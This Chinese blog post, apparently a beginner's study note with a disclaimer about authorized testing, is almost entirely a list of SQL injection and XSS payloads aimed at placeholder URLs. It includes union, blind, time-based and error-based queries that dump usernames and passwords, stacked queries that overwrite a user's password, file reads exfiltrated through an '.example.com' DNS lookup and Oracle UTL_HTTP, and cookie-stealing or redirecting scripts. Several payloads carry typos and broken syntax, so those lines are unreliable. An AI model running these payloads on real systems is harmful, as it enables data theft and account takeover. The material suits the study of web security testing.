该帖子内容为初级渗透测试注入,只为验证Web系统安全,所写内容为个人平时课程学习所得,为正常互联网产品测试内容。虽然是初级内容,也不可未经系统所属主体或组织允许,应用该帖内容;若某人不合理应用本帖子内容所造成损失,与本帖子作者无关,不负责任何法律责任;同时毕竟作者作为初学者,不可避免有些写错的地方,可以在评论区或者私信提醒,作者会根据意见修改。
SQL注入
select * from < 表名> where id = x and 1 = 1
select * from < 表名> where id = 'x' and '1' = '1
select id,name from test where id=1 or 1=1
select * from table where name=' 2 ''
select * from tables where title like '%
http://127.0.0.1/XXX.php?title=t' and '1' = '1'
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1,2,3,4,5,6,7 from INFORMATION_SCHEMA.tables --' & action= search
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1, user(), database(), table_name,version(),6,7 from INFORMATION_SCHEMA.tables where table_schema=database() -- ' & action= search
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1, column_name,3,4,5,6,7 from INFORMATION_SCHEMA.columns where table_name = ' users' -- ' & action= search
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1, login,password,4,5,6,7 from users -- ' & action= search
报文内容参数直接加'
报文内容参数直接加union :
union select 1,2 from INFORMATION_SCHKMA.tables -- &action=go
union select 1,2,3,4,5,6,7 from INFORMATION_SCHKMA.tables -- &action=go
union select user(), user(), database(),table_name,version(),user(),user() from INFORMATION_SCHEMA.tables-- &action=go
http:/ / test.com/ XXX?id= 1 and substring (version(),1 ,1 )= 5
http:/ / test.com/ XXX?id= 1 UNION ALL SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA
select * from user where id= '4' and sleep(3 )
http:/ / 127.0 .0 .1 / XXX.php?id= 1234 ' and length(database())=4 and sleep(3) -- &action=search
http://127.0.0.1/XXX.php?id=1234' and substr(database(),1 ,1 )= ‘a' and sleep(3) -- &action=search
http://127.0.0.1/XXX.php?id=1234' and length(version())= 5 and sleep(3 )
http:/ / 127.0 .0 .1 / XXX.php?id= 1234 ' and ascii(substr(database(),1,1))=98 and sleep(3) -- &action=search,其中98对应ASCII表
select floor (0.1 ),floor (0.51 ),floor (0.99 )
select 1 from (select count (* ),concat(user (),floor (rand(0 )* 2 ))x from information_schema.tables group by x)a;
select rand() from information_schema.tables limit 0.10
select count (* ),concat((select user ()),floor (rand(0 )* 2 ))x from test group by x
select extractvalue('<a><b>test</b></a>' ,'~wrong' )
select extractvalue('<a><b>test</b></a>' ,(select @@version ))
select extractvalue('<a><b>test</b></a>' ,concat((0x7e ,select @@version ))) 其中0x7e 代表通信标识符~
http:/ / 127.0 .0 .1 / XXX.php?id= 1 ' and extractvalue(1, concat(0x7e, (select @@version))) -- '
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1,concat(0x7e, (select @@version))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select user()),0x7e,(select database()))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema="xxx" limit 0,1))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema=' xxx ' limit 1,1))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_schema="users" limit 3,1))) –
http://127.0.0.1/XXX/?id=1' and extractvalue(1 , concat(0x7e , (select concat_ws(':' ,user ,password) from xxx.users limit 0 ,1 )))
select updateXML('<a><b>test</b></a>' ,'/a/b' .'updateXMLtest' )
http:/ / 127.0 .0 .1 / XXX/ ?id= 2 ' and updatexml(1,concat(0x7e,(SELECT @@version)),1) -- '
select exp (~ (select * from (select database())x))
select exp (~ (select * from (select user ())x));
select extractivalue(1 ,mid(concat(0x7e , (select concat_ws(':' ,user ,password) from dvwa.users limit 0 ,1 ) ),1 ,29 ))
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ;update t set name = 'a' where id= 1
select concat(to_base64(substr(load_file("C: \\MySQL5.7.26\\my.ini"),1 ,15 )),".example.com") as result ;
select UTL_HTTP.request('http:// 127.0.0.1/test123.php' || '?id=' || (select version from v$instance)) from dual
http:/ / 127.0 .0 .1 / xxx/ ?id= 1 '; update users set password=e10adc3949ba59abbe56e057f20f883e' where user_id= 1 ; - - & Submit= Submit#
?id= 1 and 1 = 1
?id= 1 ’ and 1 = 1
?id= 1 % df’ and 1 = 1
1 || 1 = 1 1 && 1 = 1
1 || (select user from users where user_id = 1 )= 'admin'
select * from test where id = 1 || (select count (* ) from test)> 0
1 || (select user from users limit 1 ,1 )= 'admin'
1 || (select min (user ) from group by user_id having user_id)
1 || select substr((select group_concat(name)name from test),1 , 1 ) = 't'
1 || substr(name, 1 , 1 )= unhex(74 )
1 || substr(name, 1 , 1 )= 0x74
1 || binary (name)= 0x74657374
select namefrom testwhere idlike 1
http:/ / 127.0 .0 .1 / XXX/ ?id= 133 % df% 27 union select 1 ,user (),3 % 23
http:/ / 127.0 .0 .1 / XXX.php?id= 12 union select 1 ,2 ,Host,User ,Password,6 ,7 from mysql.user limit 4 ,1 & action= go
http:/ / 127.0 .0 .1 / XXX.php?id= 12 union select 1 ,2 ,@@basedir ,@@@version ,5 ,6 ,7 from mysql.user limit 0 ,1 & action= go
XSS注入
<script > alert(1)</script >
<script > alert ("点击此处修复" );location.href ="https://www.baidu.com" </script >
<script > alert (document .cookie )</script >
<img src ="a.png" onerror =alert(1) >
<img src =x onerror =alert( "xss ")>
<script > alert'xss' </script >
<script > alert (/xss/ )</script >
<img src = ;x onerror =alert( "xss ")>
请求报头第一行等号后面参数改为%0a%3dglobal
请求报头第一行等号后面参数改为%0a%3d8*8
请求报头第一行等号后面参数改为8*8
友链:五号黯区https://www.dark5.net
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比
· DeepSeek “源神”启动!「GitHub 热点速览」
· 我与微信审核的“相爱相杀”看个人小程序副业
· Plotly.NET 一个为 .NET 打造的强大开源交互式图表库
· 上周热点回顾(2.17-2.23)